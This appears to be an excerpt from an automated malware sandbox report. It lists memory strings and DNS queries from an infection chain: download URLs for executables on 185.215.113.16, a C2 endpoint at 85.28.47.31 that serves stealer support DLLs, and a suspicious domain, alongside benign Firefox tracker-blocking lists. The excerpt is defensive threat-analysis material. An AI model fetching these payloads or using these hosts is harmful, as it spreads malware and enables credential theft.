Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: main/anti-tracking-url-decoration"://.adsafeprotected.com/.png""://.adsafeprotected.com/jload""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com/jsvid?""://.adsafeprotected.com//adj""://securepubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com//unit/""://www.facebook.com/platform/impression.php""://.adsafeprotected.com//Serving/""://ads.stickyadstv.com/auto-user-sync""https://ads.stickyadstv.com/firefox-etp""://.adsafeprotected.com/jload?""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/jsvid""://trends.google.com/trends/embed""://.adsafeprotected.com/tpl?""://trends.google.com/trends/embed"getProfileDataAsGzippedArrayBuffermain/search-default-override-allowlistmain/translations-identification-models"://.adsafeprotected.com/.gif""://.adsafeprotected.com//imp/""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.js"["://trends.google.com/trends/embed"]main/anti-tracking-url-decorationmain/devtools-compatibility-browsers"://vast.adsafeprotected.com/vast"main/websites-with-shared-credential-backends60e82333-914d-4cfa-95b1-5f034b5a704b["://trends.google.com/trends/embed"]media.videocontrols.picture-in-picture.enabledPictureInPicture:EnableSubtitlesButtonresource://gre/modules/UpdateUtils.sys.mjspictureinpicture.most_concurrent_playerspictureInPictureToggleContextMenucontext_MovePictureInPictureTogglepicture-in-picture-move-toggle-rightEmpty rectangles do not have centerscontentBlockingAllowListPrincipalresource:///modules/AttributionCode.sys.mjsFX_PICTURE_IN_PICTURE_WINDOW_OPEN_DURATIONget contentBlockingAllowListPrincipalresolveOverlapConflicts/closestCandidate<chrome://browser/content/browser.xhtml equals www.facebook.com (Facebook)
Source: firefox.exe, 0000002F.00000002.2855549826.00000130BDB50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: pData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=https://www.youtube.com/accountMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Fir equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: requestingCssToDesktopScaleBROWSER_READY_NOTIFICATIONsessionstore-windows-restoredprivilegedAboutProcessEnabledInvalid LaterRun page URL get activityStreamEnabled#picture-in-picture-buttonget shouldResistFingerprintingfocusedContentBrowsingContextkey_togglePictureInPicturepictureinpicture.settingsclosePipWindow/closedPromise<Insecure LaterRun page URL kSelfDestructSessionLimitPREF_ACTIVITY_STREAM_DEBUGupdatePlayingDurationHistogramsaddOriginatingWinToWeakMapremovePiPBrowserFromWeakMapremoveOriginatingWinFromWeakMap#respect-pipDisabled-switchpicture-in-picture-buttonsetOriginatingWindowActivecandidateDistanceToConflictvalidate/chromeModifiers<windowGlobalPipCountGeneratorPictureInPicture:UrlbarToggleget documentStoragePrincipalget contentBlockingEventsPictureInPicture:KeyToggleresolveOverlapConflicts/<PipScreenCssToDesktopScale#PictureInPicturePanelTemplate--newtab-text-primary-color--toolbarbutton-hover-background--toolbar-field-border-color--tabpanel-background-colordefault-theme@mozilla.org--newtab-background-colorlightweight-theme-styling-updateset onmozorientationchange--toolbar-field-focus-colorget onmozorientationchangetoolbar_field_highlight_textbrowser.theme.toolbar-themelwt-default-theme-in-dark-mode--lwt-background-alignment--lwt-toolbar-field-highlight--lwt-accent-color-inactive_alreadyRecordedTopsitesPainted_unsubscribeFromActivityStream--toolbar-field-background-color_determineIfColorPairIsDark_determineToolbarAndContentThemebrowser.theme.content-themetoolbar_vertical_separator--chrome-content-separator-color--toolbarbutton-icon-fill_subscribeToActivityStreamaboutHomeTopsitesFirstPaint--arrowpanel-border-colorlwt-toolbar-field-brighttextmaybeRecordTopsitesPainted--sidebar-background-colortoolbar_field_border_focusdocument-element-inserteddocument-element-insertedgetSubpropertiesForCSSPropertydocument-element-insertedLOAD_FLAGS_FORCE_ALLOW_COOKIESgetOverflowingChildrenOfElementLOAD_FLAGS_ERROR_LOAD_CHANGES_RVget mergeAttributeRecordshttps://www.youtube.com/accountwebCOOP+COEP=https://youtube.comdocument-element-insertedwebIsolated=https://youtube.comdocument-element-insertedbound _updateEnabledStatePartitioningExceptionListServicedocument-element-insertedLOAD_FLAGS_USER_ACTIVATIONset mergeAttributeRecordsbound fixupAndLoadURIStringhttps://www.youtube.com/accountwebIsolated=https://youtube.comwebIsolated=https://youtube.comfeatureUpdate:majorRelease2022getAllStyleSheetCSSStyleRulesdocument-element-insertedbrowser.newtabpage.enableddocument-element-insertedwebIsolated=https://youtube.comevictOutOfRangeContentViewersfeatureUpdate:firefoxViewNextgetRegisteredCssHighlightsunregisterExceptionListObserverservices.sync.lastTabFetchcustomizableui-special-spring2bound handleWidgetCommand#urlbar-search-mode-indicator_searchModeIndicatorClosedraggableregionleftmousedownexperimental.hideHeuristicFirefoxViewNotificationManager<isPersistedSearchTermsEnabledshouldHandOffToSearchModensIURLQueryStringStripperQUERY_STRIPPING_STRIP_ON_SHAREgetOriginalUrl
Source: firefox.exe, 00000021.00000003.2708137723.000001E53926D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2738774897.000001E539272000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: s://www.youtube.com/account --attempting-deelevation'9 equals www.youtube.com (Youtube)
Source: ead6a72944.exe, 0000001C.00000003.2704593283.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, ead6a72944.exe, 0000001C.00000003.2704365877.0000000002117000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000002.2766541210.000001E53ADC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ta\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2919430058.0000026193B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919430058.0000026193BAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194761000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2931107138.0000026194CA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2946351533.000015A18C600000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: www.youtube.comc equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2916024047.00000261935B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2922894584.0000026194711000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2916024047.0000026193568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: x://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F10F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2922562667.0000026194607000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["://webcompat-addon-testbed.herokuapp.com/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js", "://track.adform.net/serving/scripts/trackpoint/", "://track.adform.net/serving/scripts/trackpoint/async/", "://.adnxs.com//ast.js", "://.adnxs.com//pb.js", "://.adnxs.com//prebid", "://www.everestjs.net/static/st.v3.js", "://static.adsafeprotected.com/vans-adapter-google-ima.js", "://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "://cdn.branch.io/branch-latest.min.js", "://pub.doubleverify.com/signals/pub.js", "://c.amazon-adsystem.com/aax2/apstag.js", "://auth.9c9media.ca/auth/main.js", "://static.chartbeat.com/js/chartbeat.js", "://static.chartbeat.com/js/chartbeat_video.js", "://static.criteo.net/js/ld/publishertag.js", "://.imgur.com/js/vendor..bundle.js", "://.imgur.io/js/vendor..bundle.js", "://www.rva311.com/static/js/main..chunk.js", "://web-assets.toggl.com/app/assets/scripts/.js", "://libs.coremetrics.com/eluminate.js", "://connect.facebook.net//sdk.js", "://connect.facebook.net//all.js", "://secure.cdn.fastclick.net/js/cnvr-launcher//launcher-stub.min.js", "://www.google-analytics.com/analytics.js", "://www.google-analytics.com/gtm/js", "://www.googletagmanager.com/gtm.js", "://www.google-analytics.com/plugins/ua/ec.js", "://ssl.google-analytics.com/ga.js", "://s0.2mdn.net/instream/html5/ima3.js", "://imasdk.googleapis.com/js/sdkloader/ima3.js", "://www.googleadservices.com/pagead/conversion_async.js", "://www.googletagservices.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/tag/js/gpt.js", "://pagead2.googlesyndication.com/gpt/pubads_impl_.js", "://securepubads.g.doubleclick.net/tag/js/gpt.js", "://securepubads.g.doubleclick.net/gpt/pubads_impl_.js", "://script.ioam.de/iam.js", "://cdn.adsafeprotected.com/iasPET.1.js", "://static.adsafeprotected.com/iasPET.1.js", "://adservex.media.net/videoAds.js", "://.moatads.com//moatad.js", "://.moatads.com//moatapi.js", "://.moatads.com//moatheader.js", "://.moatads.com//yi.js", "://.imrworldwide.com/v60.js", "://cdn.optimizely.com/js/.js", "://cdn.optimizely.com/public/.js", "://id.rambler.ru/rambler-id-helper/auth_events.js", "://media.richrelevance.com/rrserver/js/1.2/p13n.js", "://www.gstatic.com/firebasejs//firebase-messaging.js", "://.vidible.tv//vidible-min.js", "://vdb-cdn-files.s3.amazonaws.com//vidible-min.js", "://js.maxmind.com/js/apis/geoip2//geoip2.js", "://s.webtrends.com/js/advancedLinkTracking.js", "://s.webtrends.com/js/webtrends.js", "://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000028.00000002.2922562667.000002619460B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["://track.adform.net/Serving/TrackPoint/", "://pagead2.googlesyndication.com/pagead/.jsfcd=true", "://pagead2.googlesyndication.com/pagead/js/.jsfcd=true", "://pixel.advertising.com/firefox-etp", "://cdn.cmp.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", "://.adsafeprotected.com//unit/", "://.adsafeprotected.com/jload", "://.adsafeprotected.com/jload?", "://.adsafeprotected.com/jsvid", "://.adsafeprotected.com/jsvid?", "://.adsafeprotected.com/mon", "://.adsafeprotected.com/tpl", "://.adsafeprotected.com/tpl?", "://.adsafeprotected.com/services/pub", "://.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic	DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic	DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic	DNS traffic detected: DNS query: vaniloin.fun
Source: global traffic	DNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.youtube-nocookie.com

Source: unknown

Source: firefox.exe, 00000028.00000002.2900012409.000002619227D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E68000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/soka/random.exeM
Source: explorti.exe, 00000013.00000003.2924686960.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: ba77748b9b.exe, 00000016.00000002.2776962096.00000000027AE000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853783541.00000000026E0000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.0000000002825000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/-
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/1vfQ
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/4
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.0000000002730000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.000000000274D000.00000004.00000020.00020000.00000000.sdmp, ba77748b9b.exe, 0000002E.00000002.2853920976.00000000026FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php7
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpKP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpS
Source: file.exe, 00000000.00000002.2435800238.0000000028D6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX4
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpY
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpg
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpjP
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpo
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpq
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpyv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/7vhQ
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dllUY
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllaY6C
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll&
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllk
Source: file.exe, 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/SSC:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/U
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/Uv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/dows
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/gv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31/sv
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://85.28.47.31L
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
